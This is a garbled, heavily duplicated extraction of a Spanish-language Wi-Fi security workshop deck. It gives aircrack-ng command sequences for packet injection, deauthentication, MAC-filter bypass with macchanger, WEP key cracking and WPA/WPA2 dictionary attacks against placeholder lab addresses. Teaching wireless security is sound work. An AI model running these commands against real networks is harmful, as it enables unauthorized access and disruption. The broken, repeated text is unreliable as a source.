(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 39: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 40: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

